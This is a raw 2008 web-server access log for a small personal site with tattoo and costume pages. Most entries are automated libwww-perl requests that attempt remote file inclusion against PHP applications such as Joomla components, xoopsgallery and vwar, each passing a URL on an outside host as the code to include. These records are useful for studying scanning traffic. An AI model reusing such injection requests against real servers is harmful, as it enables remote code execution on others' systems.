65.55.208.131 - - [02/Jul/2008:21:30:18 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.52.231.162 - - [02/Jul/2008:21:30:25 -0500] "GET /logs//phpauction/browse.php/header.php?prefix=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
74.52.231.162 - - [02/Jul/2008:21:30:25 -0500] "GET //phpauction/browse.php/header.php?prefix=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
72.2.88.2 - - [02/Jul/2008:21:36:56 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt??? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
72.2.88.2 - - [02/Jul/2008:21:36:56 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt??? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
65.55.208.131 - - [02/Jul/2008:21:37:38 -0500] "GET /logs/access_log.1197936000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [02/Jul/2008:21:37:38 -0500] "GET /logs/access_log.1185667200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [02/Jul/2008:21:37:39 -0500] "GET /logs/access_log.1164844800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [02/Jul/2008:21:37:39 -0500] "GET /logs/access_log.1170633600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [02/Jul/2008:21:37:39 -0500] "GET /logs/access_log.1193961600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.245.120.73 - - [02/Jul/2008:21:37:52 -0500] "GET /logs//phpauction/browse.php/header.php?prefix=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
210.245.120.73 - - [02/Jul/2008:21:37:53 -0500] "GET //phpauction/browse.php/header.php?prefix=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
85.88.12.74 - - [02/Jul/2008:21:40:22 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:40:23 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:40:25 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:21:40:25 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
195.56.111.194 - - [02/Jul/2008:21:43:28 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:21:43:28 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
91.200.212.3 - - [02/Jul/2008:21:44:33 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:21:44:34 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
210.240.12.14 - - [02/Jul/2008:21:44:37 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:21:44:37 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:21:50:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:21:50:06 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
88.255.236.6 - - [02/Jul/2008:21:54:36 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:21:54:37 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:21:54:41 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:21:54:42 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:21:54:43 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:21:54:43 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.55.208.132 - - [02/Jul/2008:21:54:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [02/Jul/2008:21:54:53 -0500] "GET /logs/access_log.1205884800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [02/Jul/2008:21:54:53 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.84.109.64 - - [02/Jul/2008:21:55:22 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.234.133.173 - - [02/Jul/2008:21:55:45 -0500] "GET /logs//db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
85.234.133.173 - - [02/Jul/2008:21:55:45 -0500] "GET //db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.811"
87.230.35.101 - - [02/Jul/2008:21:55:46 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.230.35.101 - - [02/Jul/2008:21:55:46 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
213.35.225.138 - - [02/Jul/2008:21:56:26 -0500] "GET /logs//db.php?path_local=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
213.35.225.138 - - [02/Jul/2008:21:56:26 -0500] "GET //db.php?path_local=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:21:56:31 -0500] "GET /logs//db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
89.188.110.30 - - [02/Jul/2008:21:56:31 -0500] "GET //db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
65.49.13.112 - - [02/Jul/2008:21:58:06 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:58:06 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:58:07 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
65.49.13.112 - - [02/Jul/2008:21:58:07 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
87.106.98.71 - - [02/Jul/2008:21:58:11 -0500] "GET /logs//db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
87.106.98.71 - - [02/Jul/2008:21:58:11 -0500] "GET //db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
200.30.73.117 - - [02/Jul/2008:21:58:38 -0500] "GET /logs//db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
200.30.73.117 - - [02/Jul/2008:21:58:38 -0500] "GET //db.php?path_local=http://gukmin.or.kr/bbs/id.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
87.106.101.24 - - [02/Jul/2008:22:00:24 -0500] "GET /logs//db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
87.106.101.24 - - [02/Jul/2008:22:00:24 -0500] "GET //db.php?path_local=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
87.242.99.137 - - [02/Jul/2008:22:00:36 -0500] "GET /logs/booth.php?include_path=http://canboakvaryum.com/TR/templates/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.242.99.137 - - [02/Jul/2008:22:00:36 -0500] "GET /booth.php?include_path=http://canboakvaryum.com/TR/templates/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.151.233.69 - - [02/Jul/2008:22:05:54 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
203.151.233.69 - - [02/Jul/2008:22:05:55 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
208.53.158.49 - - [02/Jul/2008:22:06:04 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
208.53.158.49 - - [02/Jul/2008:22:06:04 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
208.100.1.164 - - [02/Jul/2008:22:10:38 -0500] "GET //modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
208.100.1.164 - - [02/Jul/2008:22:10:38 -0500] "GET /logs//modules/xoopsgallery//init_basic.php?GALLERY_BASEDIR=http://www.cabildoonline.com/html/images/idd.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
65.55.208.119 - - [02/Jul/2008:22:12:02 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [02/Jul/2008:22:12:07 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.234.171.33 - - [02/Jul/2008:22:21:07 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""ia_archiver"
195.56.111.194 - - [02/Jul/2008:22:26:18 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:22:26:18 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
210.245.120.73 - - [02/Jul/2008:22:28:10 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.120.73 - - [02/Jul/2008:22:28:10 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.25.197.15 - - [02/Jul/2008:22:28:38 -0500] "GET /logs//impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
193.25.197.15 - - [02/Jul/2008:22:28:38 -0500] "GET //impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
85.119.244.24 - - [02/Jul/2008:22:29:04 -0500] "GET /logs//impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
85.119.244.24 - - [02/Jul/2008:22:29:04 -0500] "GET //impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
72.68.202.15 - - [02/Jul/2008:22:30:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&q=vintage+tattoo+flash&btnG=Google+Search""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:36 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:44 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
91.200.212.3 - - [02/Jul/2008:22:30:45 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:22:30:45 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
72.68.202.15 - - [02/Jul/2008:22:30:50 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:50 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:50 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.68.202.15 - - [02/Jul/2008:22:30:51 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.52.131.56 - - [02/Jul/2008:22:33:57 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
72.52.131.56 - - [02/Jul/2008:22:33:57 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
85.119.244.24 - - [02/Jul/2008:22:33:58 -0500] "GET /logs//impex/ImpExData.php?systempath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
85.119.244.24 - - [02/Jul/2008:22:33:59 -0500] "GET //impex/ImpExData.php?systempath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
193.25.197.15 - - [02/Jul/2008:22:34:08 -0500] "GET /logs//impex/ImpExData.php?systempath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
193.25.197.15 - - [02/Jul/2008:22:34:08 -0500] "GET //impex/ImpExData.php?systempath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
85.119.244.24 - - [02/Jul/2008:22:36:21 -0500] "GET /logs//impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
85.119.244.24 - - [02/Jul/2008:22:36:22 -0500] "GET //impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
193.25.197.14 - - [02/Jul/2008:22:38:08 -0500] "GET /logs//impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
193.25.197.14 - - [02/Jul/2008:22:38:08 -0500] "GET //impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
193.25.197.14 - - [02/Jul/2008:22:38:15 -0500] "GET /logs//impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
193.25.197.14 - - [02/Jul/2008:22:38:16 -0500] "GET //impex/ImpExData.php?systempath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
85.88.12.74 - - [02/Jul/2008:22:41:19 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:22:41:19 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:22:41:23 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:22:41:23 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
88.255.236.6 - - [02/Jul/2008:22:45:52 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:22:45:53 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tarana.co.nz/gallely/includes/ons.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:22:46:21 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:22:46:21 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.electrabike.fr/images/ons.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.56.111.194 - - [02/Jul/2008:22:46:29 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:22:46:29 -0500] "GET /convert/mvcw.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
85.88.12.74 - - [02/Jul/2008:22:46:32 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.88.12.74 - - [02/Jul/2008:22:46:32 -0500] "GET /convert/mvcw.php?vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
91.200.212.3 - - [02/Jul/2008:22:47:09 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:22:47:09 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
88.255.236.6 - - [02/Jul/2008:22:47:38 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
88.255.236.6 - - [02/Jul/2008:22:47:38 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://easyshortsalenegotiation.com/includes/ons.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.210.113.58 - - [02/Jul/2008:22:48:32 -0500] "GET /logs//impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
62.210.113.58 - - [02/Jul/2008:22:48:32 -0500] "GET //impex/ImpExData.php?systempath=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
210.240.12.14 - - [02/Jul/2008:22:49:15 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
210.240.12.14 - - [02/Jul/2008:22:49:16 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
195.56.111.194 - - [02/Jul/2008:22:49:59 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
195.56.111.194 - - [02/Jul/2008:22:49:59 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
91.200.212.3 - - [02/Jul/2008:22:50:23 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
91.200.212.3 - - [02/Jul/2008:22:50:23 -0500] "GET /convert/mvcw.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
205.234.240.98 - - [02/Jul/2008:22:50:49 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
205.234.240.98 - - [02/Jul/2008:22:50:49 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
72.55.165.116 - - [02/Jul/2008:22:52:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
